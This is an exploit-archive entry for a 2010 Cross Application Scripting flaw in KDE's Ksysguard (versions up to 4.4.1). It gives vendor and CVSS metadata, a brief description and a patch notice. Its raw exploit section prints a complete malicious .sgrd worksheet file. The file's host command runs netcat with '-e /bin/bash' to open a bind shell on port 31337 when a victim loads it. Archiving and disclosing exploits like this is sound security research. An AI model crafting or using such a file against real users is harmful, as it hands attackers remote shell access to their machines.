Ksysguard RCE via Cross Application Scripting

vendor:

Ksysguard

by:

Emanuele 'emgent' Gentili

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Ksysguard

Affected Version From: <= 4.4.1

Affected Version To: <= 4.4.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:kde:ksysguard

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

Ksysguard RCE via Cross Application Scripting

Ksysguard is vulnerable to Cross Application Scripting (CAS) which allows an attacker to execute arbitrary code on the target system. The exploit code provided by the author is a ph33r.sgrd file which contains a command to open a netcat listener on port 31337 and execute a bash shell. The vulnerability affects versions of Ksysguard up to and including 4.4.1.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting 
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting



halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$